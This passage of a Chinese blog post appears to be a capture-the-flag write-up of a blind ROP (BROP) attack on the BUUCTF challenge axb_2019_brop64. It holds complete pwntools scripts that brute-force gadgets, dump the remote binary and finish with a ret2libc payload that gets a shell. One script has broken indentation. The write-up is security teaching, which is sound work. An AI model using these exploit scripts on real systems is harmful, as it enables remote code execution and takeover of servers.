<p>首先此处我们可以先泄露原来的返回地址，得到基址，进而缩小爆破范围。(也可以不用，一般都是0x400000)</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">29457</span>)</span><br><span class="line">padding_length=<span class="number">216</span> <span class="comment">#将栈填满</span></span><br><span class="line">sh.recvuntil(<span class="string">&quot;Please tell me:&quot;</span>)</span><br><span class="line">sh.send(<span class="string">&#x27;A&#x27;</span> * padding_length)<span class="comment">#程序在读取时自动加上了&#x27;\x00&#x27;,</span></span><br><span class="line">sh.recvuntil(<span class="string">&#x27;A&#x27;</span> * padding_length)</span><br><span class="line">old_return_addr=u64(sh.recvuntil(<span class="string">&#x27;Goodbye!&#x27;</span>).strip(<span class="string">&#x27;Goodbye!&#x27;</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))<span class="comment">#所以会多接收一个栈帧的内容。</span></span><br><span class="line">log.info(<span class="string">&#x27;The old return address is &#x27;</span>+ <span class="built_in">hex</span>(old_return_addr))</span><br></pre></td></tr></table></figure></div>

<p>事实上，如果程序在读取时并没有多加一个字符，是无法打印返回地址的。在这里，可以打印，说明程序多读取了一个字节\x00。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b10.png?x-oss-process=style/watermark"
                     
                ></p>
<p>得到程序的基址0x400000。</p>
<p>然后爆破main地址：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Find_stop_gadget</span>(<span class="params">old_return_addr,padding_length</span>):</span><br><span class="line">    maybe_low_byte=<span class="number">0x0000</span> <span class="comment">#对后四个字节进行遍历,节省时间，可以直接从0x0700开始</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            sh = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">25763</span>)</span><br><span class="line">            sh.recvuntil(<span class="string">&quot;Please tell me:&quot;</span>)</span><br><span class="line">            sh.send(<span class="string">&#x27;A&#x27;</span> * padding_length + p16(maybe_low_byte)) <span class="comment">#覆盖返回地址后四个字节</span></span><br><span class="line">            <span class="keyword">if</span> maybe_low_byte &gt; <span class="number">0xFFFF</span>: <span class="comment">#遍历完还没有成功，说明基址有问题</span></span><br><span class="line">                log.error(<span class="string">&quot;All low byte is wrong!&quot;</span>)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;Hello&quot;</span> <span class="keyword">in</span> sh.recvall(timeout=<span class="number">1</span>): <span class="comment">#如果hello再次出现，说明返回到了main函数</span></span><br><span class="line">                log.success(<span class="string">&quot;We found a stop gadget is &quot;</span> + <span class="built_in">hex</span>(old_return_addr+maybe_low_byte))</span><br><span class="line">                <span class="keyword">return</span> (old_return_addr+padding_length)</span><br><span class="line">            maybe_low_byte=maybe_low_byte+<span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line">            sh.close() </span><br><span class="line">            </span><br><span class="line">stop_gadget=Find_stop_gadget(<span class="number">0x400000</span>,<span class="number">216</span>)</span><br></pre></td></tr></table></figure></div>

<p>这个过程有点长，可能要多等一会儿。中间靶机挂掉了一次，然后重新开了一个靶机，不影响后续。爆破结果：<strong>0x4007d6</strong></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b11.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="3-3-寻找BROP-gadget"><a href="#3-3-寻找BROP-gadget" class="headerlink" title="3.3 寻找BROP gadget"></a>3.3 寻找BROP gadget</h2><p>正如我们在原理中所说的，如果找到连续pop 6个的gadget，那么就是通用的gadgets。</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_brop_gadget</span>(<span class="params">length, stop_gadget</span>):</span><br><span class="line">	addr=<span class="number">0x400000</span> <span class="comment">#节省时间，可以直接从0x400900开始</span></span><br><span class="line">	<span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">		<span class="keyword">try</span>:</span><br><span class="line">			sh = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">25763</span>)</span><br><span class="line">			sh.recvuntil(<span class="string">&#x27;me:&#x27;</span>)</span><br><span class="line">			payload = <span class="string">&#x27;a&#x27;</span> * length + p64(addr) + p64(<span class="number">0</span>) * <span class="number">6</span> + p64(stop_gadget) + p64(<span class="number">0</span>) * <span class="number">10</span> <span class="comment">#连续pop6个程序不崩溃</span></span><br><span class="line">			sh.sendline(payload)</span><br><span class="line">			<span class="keyword">if</span> <span class="string">&#x27;Hello&#x27;</span> <span class="keyword">in</span> sh.recvall(timeout=<span class="number">1</span>):</span><br><span class="line">				log.success(<span class="string">&quot;We found a brop gadget is &quot;</span> + <span class="built_in">hex</span>(addr))</span><br><span class="line">				<span class="keyword">return</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">			addr+=<span class="number">1</span></span><br><span class="line">		<span class="keyword">except</span> Exception:</span><br><span class="line">			<span class="keyword">pass</span></span><br><span class="line">			sh.close()</span><br><span class="line"></span><br><span class="line">brop_gadget=get_brop_gadget(<span class="number">216</span>,<span class="number">0x4007d6</span>)</span><br></pre></td></tr></table></figure></div>

<p>得到结果：<strong>0x40095a</strong></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b12.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="3-4-寻找puts-plt"><a href="#3-4-寻找puts-plt" class="headerlink" title="3.4 寻找puts@plt"></a>3.4 <strong>寻找puts@plt</strong></h2><p>0x400000程序头的位置，前四个字符为 \x7fELF。因此可以使用0x400000的地址进行测试，如果程序成功打印出来\x7fELF，就说明我们找到puts_plt的地址了：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_puts_addr</span>(<span class="params">length, rdi_ret, stop_gadget</span>):</span><br><span class="line">    addr = <span class="number">0x400000</span> <span class="comment">#节省时间，可以直接从0x400600开始</span></span><br><span class="line">    <span class="keyword">while</span> <span class="number">1</span>:       </span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">        	sh = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">25763</span>)</span><br><span class="line">        	sh.recvuntil(<span class="string">&#x27;me:&#x27;</span>)</span><br><span class="line">        	payload = <span class="string">&#x27;A&#x27;</span> * length + p64(rdi_ret) + p64(<span class="number">0x400000</span>) + p64(addr) + p64(stop_gadget) <span class="comment">#打印addr的内容</span></span><br><span class="line">        	sh.sendline(payload)</span><br><span class="line">		<span class="keyword">if</span> <span class="string">&quot;ELF&quot;</span> <span class="keyword">in</span> sh.recvall(timeout=<span class="number">1</span>): <span class="comment">#如果有ELF，那么成功找到plt</span></span><br><span class="line">			log.success(<span class="string">&quot;We found puts addr is &quot;</span> + <span class="built_in">hex</span>(addr))</span><br><span class="line">			<span class="keyword">return</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">		addr+=<span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">	    <span class="keyword">pass</span></span><br><span class="line">            sh.close()</span><br><span class="line">puts_addr=get_puts_addr(<span class="number">216</span>, <span class="number">0x40095a</span>+<span class="number">9</span>, <span class="number">0x4007d6</span>)</span><br></pre></td></tr></table></figure></div>

<p>得到puts_plt的地址：<strong>0x400635</strong></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b13.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="3-5-利用puts-plt，Dump源文件"><a href="#3-5-利用puts-plt，Dump源文件" class="headerlink" title="3.5 利用puts@plt，Dump源文件"></a>3.5 <strong>利用puts@plt，Dump源文件</strong></h2><div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Dump_file</span>(<span class="params">func_plt,padding_length,stop_gadget,brop_gadget</span>):</span><br><span class="line">    process_old_had_received_length=<span class="number">0</span></span><br><span class="line">    process_now_had_received_length=<span class="number">0</span></span><br><span class="line">    file_content=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            sh = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">25763</span>)</span><br><span class="line">            <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">                sh.recvuntil(<span class="string">&quot;Please tell me:&quot;</span>)</span><br><span class="line">                payload  = <span class="string">&#x27;A&#x27;</span> * (padding_length - <span class="built_in">len</span>(<span class="string">&#x27;Begin_leak-----&gt;&#x27;</span>))</span><br><span class="line">                payload += <span class="string">&#x27;Begin_leak-----&gt;&#x27;</span></span><br><span class="line">                payload += p64(brop_gadget+<span class="number">9</span>) <span class="comment"># pop rdi;ret;</span></span><br><span class="line">                payload += p64(<span class="number">0x400000</span>+process_now_had_received_length)</span><br><span class="line">                payload += p64(func_plt)</span><br><span class="line">                payload += p64(stop_gadget)</span><br><span class="line">                sh.send(payload) <span class="comment">#payload就相当于 &#x27;a&#x27;*216 + pop_rdi + addr + puts_addr + main,打印addr里的内容,返回到main</span></span><br><span class="line">                sh.recvuntil(<span class="string">&#x27;Begin_leak-----&gt;&#x27;</span>)</span><br><span class="line">                received_data = sh.recvuntil(<span class="string">&#x27;\nHello&#x27;</span>)[<span class="number">3</span>:-<span class="number">6</span>]<span class="comment">#需要去掉多读取的pop_rdi</span></span><br><span class="line">                <span class="keyword">if</span> <span class="built_in">len</span>(received_data) == <span class="number">0</span> :</span><br><span class="line">                    file_content += <span class="string">&#x27;\x00&#x27;</span></span><br><span class="line">                    process_now_had_received_length += <span class="number">1</span></span><br><span class="line">                <span class="keyword">else</span> :</span><br><span class="line">                    file_content += received_data</span><br><span class="line">                    process_now_had_received_length += <span class="built_in">len</span>(received_data)</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">if</span> process_now_had_received_length == process_old_had_received_length :</span><br><span class="line">                log.info(<span class="string">&#x27;We get &#x27;</span> + <span class="built_in">str</span>(process_old_had_received_length) +<span class="string">&#x27; byte file!&#x27;</span>)</span><br><span class="line">                <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;axb_2019_brop64_dump&#x27;</span>,<span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> fout:</span><br><span class="line">                    fout.write(file_content)</span><br><span class="line">                <span class="keyword">return</span></span><br><span class="line">            process_old_had_received_length = process_now_had_received_length</span><br><span class="line">            sh.close()</span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">puts_addr=<span class="number">0x400635</span> <span class="comment">#0x400640</span></span><br><span class="line">padding_length=<span class="number">216</span></span><br><span class="line">stop_gadget=<span class="number">0x4007d6</span></span><br><span class="line">brop_gadget=<span class="number">0x40095a</span></span><br><span class="line">Dump_file(puts_addr,padding_length,stop_gadget,brop_gadget)</span><br></pre></td></tr></table></figure></div>

<p>dump下了4096字节：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b17.png?x-oss-process=style/watermark"
                     
                ></p>
<p>用IDA打开，选择下面的Binary file，以二进制文件打开。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b18.png?x-oss-process=style/watermark"
                     
                ></p>
<p>编辑 –&gt; 段 –&gt; 编辑程序基址：Edit –&gt; Segments –&gt; Rebase program –&gt; value&#x3D;0x400000</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b19.png?x-oss-process=style/watermark"
                     
                ></p>
<p>找到 puts 函数位置，也就是我们之前找到的0x400635，按键盘上的C键显示汇编代码：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b21.png?x-oss-process=style/watermark"
                     
                ></p>
<p>找到 puts_got 的地址：<strong>0x601018</strong></p>
<h2 id="3-6-溢出"><a href="#3-6-溢出" class="headerlink" title="3.6 溢出"></a>3.6 溢出</h2><p>最后按常规方法溢出就可以</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">&quot;debug&quot;</span> <span class="comment">#调试用</span></span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">25763</span>)</span><br><span class="line">main=<span class="number">0x4007d6</span></span><br><span class="line">puts_plt=<span class="number">0x400640</span></span><br><span class="line">puts_got=<span class="number">0x601018</span></span><br><span class="line">pop_rdi=<span class="number">0x400963</span> <span class="comment">#brop_gadget+9	</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;Please tell me:&#x27;</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">216</span>+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)<span class="comment">#泄露puts地址</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">puts_addr=u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">success(<span class="string">&#x27;puts_addr:&#x27;</span>+<span class="built_in">hex</span>(puts_addr))</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts_addr)</span><br><span class="line">libc_base=puts_addr-libc.dump(<span class="string">&#x27;puts&#x27;</span>)</span><br><span class="line">system=libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh=libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">216</span>+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>结果：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b16.png?x-oss-process=style/watermark"
                     
                ></p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> BROP</li>
        <li><strong>Author:</strong> wutong</li>
        <li><strong>Created at:</strong> 2023-07-17 10:44:41</li>
        
            <li>
                <strong>Updated at:</strong> 2023-07-30 19:27:12
            </li>
        
        <li>
            <strong>Link:</strong> https://wutong01304.github.io/2023/07/17/BROP/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Pwn/">#Pwn</a>&nbsp;
                        </li>
                    
                        <li class="tag-item">
                            <a href="/tags/Stack/">#Stack</a>&nbsp;
                        </li>
                    
                        <li class="tag-item">
                            <a href="/tags/BROP/">#BROP</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/07/19/tricks/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">花式栈溢出技巧</span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/07/15/SROP/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">SROP</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">BROP</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86"><span class="nav-text">一、基本原理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-%E4%BB%8B%E7%BB%8D"><span class="nav-text">1.1 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="nav-text">1.2 攻击原理</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B"><span class="nav-text">二、攻击流程</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-Stack-Reading"><span class="nav-text">2.1 Stack Reading</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-Bind-ROP"><span class="nav-text">2.2 Bind ROP</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E4%BE%8B%E9%A2%98"><span class="nav-text">三、例题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-%E5%88%A4%E6%96%AD%E6%A0%88%E6%BA%A2%E5%87%BA%E9%95%BF%E5%BA%A6"><span class="nav-text">3.1 判断栈溢出长度</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2-%E5%AF%BB%E6%89%BEstop-gadget"><span class="nav-text">3.2  寻找stop gadget</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-3-%E5%AF%BB%E6%89%BEBROP-gadget"><span class="nav-text">3.3 寻找BROP gadget</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-4-%E5%AF%BB%E6%89%BEputs-plt"><span class="nav-text">3.4 寻找puts@plt</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-5-%E5%88%A9%E7%94%A8puts-plt%EF%BC%8CDump%E6%BA%90%E6%96%87%E4%BB%B6"><span class="nav-text">3.5 利用puts@plt，Dump源文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-6-%E6%BA%A2%E5%87%BA"><span class="nav-text">3.6 溢出</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2023</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">wutong</a>
        </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.2.1</a>
        </div>
        
        
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
